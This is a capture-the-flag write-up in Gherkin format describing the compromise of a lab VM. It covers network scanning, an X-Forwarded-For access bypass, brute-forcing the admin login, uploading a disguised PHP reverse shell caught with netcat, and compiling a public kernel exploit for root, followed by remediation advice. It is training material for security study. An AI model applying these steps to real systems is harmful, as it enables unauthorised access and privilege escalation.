## Version 1.4.1
## language: en

Feature:
  TOE:
    yousef
  Category:
    Remote Code Execution
  Location:
    http://192.168.5.3:80/adminstration/upload/
  CWE:
    CWE-94: Improper Control of Generation of Code ('Code Injection')
  Rule:
    REQ.041: https://fluidattacks.com/products/rules/list/041
  Goal:
    Get remote connection and find the two flags
  Recommendation:
    It’d better avoid uploading files without the correct file validation to
    reduce the probability of suffering a xss attack

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Burp Suit Community Edition| 2020.9.1 |
    | Gobuster                   | 3.0.1    |
    | Netcat                     | 1.10     |
    | Nmap                       | 7.91     |
    | SearchSploit               | 3.8.3    |

  TOE information:
    Given a .OVA file
    When I saw its extension
    Then I executed it on Virtualbox
    Then I saw that the machine was running Ubuntu 14.04
    And it was requesting a password as it's shown in [evidence] (01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip addr show eth0
    """
    And I got the next result
    """
    eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
    group default qlen 1000 link/ether 08:00:27:ab:08:1c brd ff:ff:ff:ff:ff:ff
    inet 192.168.5.2/29 brd 192.168.5.7 scope global dynamic noprefixroute eth0
    valid_lft 311sec preferred_lft 311sec
    inet6 fe80::a00:27ff:feab:81c/64 scope link noprefixroute
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 192.168.5.0/29
    """
    And I got the next result
    """
    Nmap scan report for 192.168.5.2
    Host is up (0.00070s latency).
    Nmap scan report for 192.168.5.3
    Host is up (0.00067s latency).
    """
    Then I knew that 192.168.5.3 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -A 192.168.5.3
    """
    And I got the next result
    """
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13
    (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA)
    |   2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA)
    |   256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA)
    |_  256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519)
    80/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
    |_http-server-header: Apache/2.4.10 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Then I saw that ports 22 and 80 were running SSH and HTTP respectively
    And SSH and HTTP were using 2.0 and 2.4.10 versions

  Scenario: Normal use case
    Given HTTP service was working on port 80
    Then I could access to site webpage on http://192.168.5.3:80 using browser
    And thus I could see the webpage [evidence] (02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't find any wrong
    When I was analyzing the web server
    Then I scanned the server directories with gobuster using the next command
    """
    gobuster dir -u 192.168.5.3 -w /usr/share/SecLists/Discovery/
    Web-Content/raft-large-words.txt -x php,html,txt -s 200,204,301,302,307,401
    """
    Then I got the next output
    """
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.5.3
    [+] Threads:        10
    [+] Wordlist:       /usr/share/SecLists/Discovery/Web-Content/
    raft-large-words.txt
    [+] Status codes:   200,204,301,302,307,401
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     html,php,txt
    [+] Timeout:        10s
    ===============================================================
    2021/02/25 08:52:22 Starting gobuster
    ===============================================================
    /index.php (Status: 200)
    /. (Status: 200)
    /adminstration (Status: 301)
    ===============================================================
    2021/02/25 08:53:37 Finished
    ===============================================================
    """
    Then I tried to enter in the adminstration directory
    And I couldn't access since I didn't have permissions [evidence] (03.png)
    Then I added X-Forwarded-For with the target's ip to the HTTP header
    And I sent the HTTP request again using burp suit [evidence] (04.png)
    And thus I accessed successfully to the adminstration directory
    Then I got a login web page
    And I tried a login with and user and password [evidence] (05.png)
    Then I intercepted that package with burp suit
    And I used intruder module to try a brute force attack [evidence] (06.png)
    Then I set the payloads and started the attack [evidence] (07.png)
    Then I found the correct username and password [evidence] (08.png)
    Then I used the credential previously found in the login web page
    And I accessed to the administration panel [evidence] (09.png)
    Then I entered in the user menu [evidence] (10.png)
    And I didn't found any clue
    Then I accessed to the upload option
    And I could appreciated a menu to upload a file [evidence] (11.png)
    Then I downloaded the php reverse shell from
    """
    https://github.com/pentestmonkey/php-reverse-shell/blob/master
    /php-reverse-shell.php
    """
    When I analyzed its content
    Then I modified IP parameter with the attacker's ip address
    And I tried to upload it in the web server
    Then I received an error due to the file wasn't allowed
    Then I tried upload an image file
    And I intercepted that package using burp suit [evidence] (12.png)
    Then I changed its content and its extension [evidence] (13.png)
    And I uploaded the php reverse shell successfully [evidence] (14.png)
    Then I configured the port 1234 in listed mode with the next command
    """
    nc -lvnp 1234
    """
    Then I executed the php script uploaded previously

  Scenario: Exploitation
    Given I previously executed the php file
    And I configured the port 1234 in listen mode using netcat
    Then I got remote access as it can see in [evidence] (15.png)
    Then listed the home files using the below command
    """
    ls /home
    """
    And I got the next result
    """
    user.txt
    yousef
    """
    Then I executed the next command
    """
    cat user.txt
    """
    And thus I found out the first flag [evidence] (16.png)
    Then I tried to list the root content using the below command
    """
    ls -l /root
    """
    Then I got the next error message
    """
    ls: cannot open directory /root: Permission denied
    """
    Then searched information about the target's system with the command
    """
    uname -a
    """
    And I got the next result
    """
    Linux yousef-VirtualBox 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10
    19:08:14 UTC 2014 i686 i686 i686 GNU/Linux
    """
    When I analyzed the previous output
    Then I identified it kernel version
    And I searched an exploit to get the root privileges with searchsploit
    """
    searchsploit 3.13
    """
    Then I found some exploits to to do that
    """
    ---------------------------- ----------------------------
    Exploit Title              |  Path
    ---------------------------- ----------------------------
    Linux Kernel 3.13 -        | linux/local/33824.c
    Linux Kernel 3.13.0 < 3.19 | linux/local/37292.c
    Linux Kernel 3.13.0 < 3.19 | linux/local/37293.txt
    Linux Kernel 3.13.1 -      | linux/local/40503.rb
    Linux Kernel 3.13/3.14     | linux/dos/36743.c
    Linux Kernel 3.4 < 3.13.2  | linux_x86-64/local/31347.c
    Linux Kernel 3.4 < 3.13.2  | linux/local/31346.c
    Linux Kernel 3.4 < 3.13.2  | linux/dos/31305.c
    ---------------------------------------------------------
    """
    Then I chose the second one in the previous list
    And I verified that gcc was installed with the next command
    """
    gcc --version
    """
    And I got the below result
    """
    gcc (Ubuntu 4.8.2-19ubuntu1) 4.8.2
    """
    And using the technique previously mentioned
    Then I uploaded the exploit in the server as it show in [evidence] (17.png)
    And I used the next command to enter in the file directory
    """
    cd /www/var/html/adminstration/upload/files
    """
    Then I compiled the exploit previously uploaded with the command
    """
    gcc 1614271076Screenshot_2021-01-15_17_49_19.c
    """
    And thus I got the next file
    """
    a.out
    """
    Then I executed it with the command
    """
    ./a.out
    """
    And thus I got the root privileges
    Then I listed the root directory again with the command
    """
    ls /root
    """
    And I found the next file
    """
    root.txt
    """
    Then I visualizated its content with the below command
    """
    cat /root/root.txt
    """
    And I found out the last flag as it can see in [evidence] (18.png)

  Scenario: Remediation
    Given the system is vulnerable to a remote code execution attack
    And the passwords are weak
    And the uploading files verification isn't appropriate
    Then it'd better verify the uploaded files content
    And validating that their structure corresponds with the file type
    And validating that their content don't have malicious code
    And establish good password policies to have strong passwords

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     8/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.7/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.7/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-02-25
